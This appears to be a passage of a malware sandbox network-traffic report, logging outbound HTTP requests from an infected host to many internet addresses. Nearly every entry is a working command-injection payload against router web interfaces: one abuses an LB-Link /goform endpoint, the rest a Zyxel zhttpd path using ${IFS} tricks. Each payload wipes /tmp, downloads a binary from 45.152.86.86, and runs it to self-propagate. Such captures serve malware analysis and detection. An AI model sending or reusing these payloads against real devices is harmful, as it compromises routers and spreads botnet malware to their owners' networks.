                                        Mar 31, 2024 09:22:05.450277090 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        839192.168.2.2360354189.43.48.217443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:30.221400976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        840192.168.2.235861092.124.36.83443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:30.221432924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        841192.168.2.234427097.16.105.8443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:30.221466064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        842192.168.2.2359728148.125.20.15443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:30.221497059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        843192.168.2.234543020.72.200.227443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:30.221524954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        844192.168.2.2355984107.38.156.42443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:30.221556902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        845192.168.2.2344422100.62.27.53443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:30.221620083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        846192.168.2.2350186135.25.74.66443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:30.221636057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        847192.168.2.2357386116.23.37.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:30.221673012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        848192.168.2.233521084.192.126.213443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:30.221714020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        849192.168.2.2354360145.88.175.79443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:30.221779108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        850192.168.2.23381048.122.138.192443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:30.221832991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        851192.168.2.234233646.160.28.226443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:30.221884012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        852192.168.2.2352178100.63.56.210443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:30.221910000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        853192.168.2.233635450.150.236.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:30.221940994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        854192.168.2.234155639.193.144.58443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:30.221992970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        855192.168.2.2354964223.71.53.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:30.222064972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        856192.168.2.2357056125.188.166.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:30.222551107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        857192.168.2.235330286.176.153.143443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:31.225816965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        858192.168.2.2357056180.25.22.173443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:31.225882053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        859192.168.2.2360350147.173.14.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:31.225990057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        860192.168.2.2346244193.223.113.25443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:31.225991964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        861192.168.2.2338822189.220.189.116443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:31.226073027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        862192.168.2.2357330129.244.156.130443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:31.226310015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        863192.168.2.234959036.116.122.8443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:31.226372957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        864192.168.2.234274266.235.152.171443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:31.226428986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        865192.168.2.2344958125.221.218.90443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:31.226464987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        866192.168.2.234724849.14.3.55443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.238677979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        867192.168.2.234788425.36.62.101443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.238725901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        868192.168.2.2350532221.162.53.132443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.238769054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        869192.168.2.2343190194.108.67.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.238825083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        870192.168.2.2346062210.224.105.190443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.238862038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        871192.168.2.233488638.57.28.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.238951921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        872192.168.2.2355420183.196.192.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.238974094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        873192.168.2.2360676150.74.60.169443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.239012957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        874192.168.2.235635019.15.53.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.239077091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        875192.168.2.233531662.228.174.137443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.239130020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        876192.168.2.2335160212.172.106.192443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.239160061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        877192.168.2.234306096.137.151.75443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.239223003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        878192.168.2.2351560170.30.183.112443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.239310026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        879192.168.2.23364468.251.43.208443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.239355087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        880192.168.2.2352726153.194.180.144443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.239409924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        881192.168.2.2334948139.23.32.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.239454985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        882192.168.2.2353204150.32.37.162443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.239500046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        883192.168.2.2358582131.32.18.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.239545107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        884192.168.2.2360702190.210.52.48443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.239587069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        885192.168.2.233316469.246.87.130443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.239645958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        886192.168.2.234813852.185.28.215443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.239712000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        887192.168.2.235949647.181.106.237443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.239757061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        888192.168.2.23414504.178.56.109443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.239794016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        889192.168.2.2346162160.195.99.251443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.239849091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        890192.168.2.235359460.129.73.116443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.239887953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        891192.168.2.2334058211.4.85.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.239948988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        892192.168.2.2333980130.59.117.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.240001917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        893192.168.2.2334818119.74.216.178443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.240045071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        894192.168.2.2345014150.93.185.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.240093946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        895192.168.2.2356762145.83.158.0443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.240155935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        896192.168.2.2351084184.82.218.65443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.240211010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        897192.168.2.2355280155.12.225.20443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.240271091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        898192.168.2.2336040137.111.241.152443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.240314960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        899192.168.2.233555482.42.190.45443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.240384102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        900192.168.2.2358034120.39.239.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.240434885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        901192.168.2.2351920190.52.236.183443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.240475893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        902192.168.2.2333394166.242.182.127443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.240514994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        903192.168.2.233417018.151.40.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.240555048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        904192.168.2.2337954193.195.179.95443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.240611076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        905192.168.2.2335794143.20.232.200443
                                        TimestampBytes transferredDirectionData
